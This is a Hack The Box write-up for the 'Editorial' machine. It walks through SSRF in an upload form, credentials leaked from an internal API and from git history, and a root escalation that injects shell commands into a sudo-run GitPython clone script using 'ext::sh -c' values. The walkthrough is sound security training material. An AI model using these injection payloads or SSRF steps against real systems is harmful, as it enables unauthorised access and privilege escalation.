Hack The Box / LINUX / 2026-03-27
Hack The Box - Editorial (Linux)
SSRF in file upload reaches internal API, leaked credentials enable SSH pivot, and GitPython CVE abuse in sudo script yields root.
Target
- IP:
10.129.177.192
Recon
sudo nmap -sC -sV 10.129.177.192 -p- -T5 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add editorial.htb to /etc/hosts.
SSRF Discovery
Browse to http://editorial.htb/upload.
The page accepts a URL and triggers an HTTP request to it.
Observed header:
User-Agent: python-requests/2.25.1
This behavior allows SSRF.
Internal Port Discovery
Use the attached script:
attachments/brute_ports.py
python3 attachments/brute_ports.py
Port 5000 is open
Retrieve internal API content using:
attachments/get_page.py
python3 attachments/get_page.py | jq .
Some endpoints are listed.
python3 attachments/get_page.py api/latest/metadata/messages/authors
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}
User Pivot
ssh dev@editorial.htb
Use password:
dev080217_devAPI!@
There is an apps directory containing a .git folder.
Download it and inspect commit history (for example in VS Code). In commit feat: create api to editorial info, file app_api/app.py contains:
Username: prod
Password: 080217_Producti0n_2023!@
Connect with the prod account via SSH.
Privilege Escalation
sudo -l
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
Relevant vulnerability:
https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858
Check version:
python3
>>> import git
>>> git.__version__
'3.1.29'
This version is vulnerable.
Exploit command execution:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c touch% /tmp/pwned'
Copy root flag:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cp% /root/root.txt% /tmp'
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% o+r% /tmp/root.txt'
cat /tmp/root.txt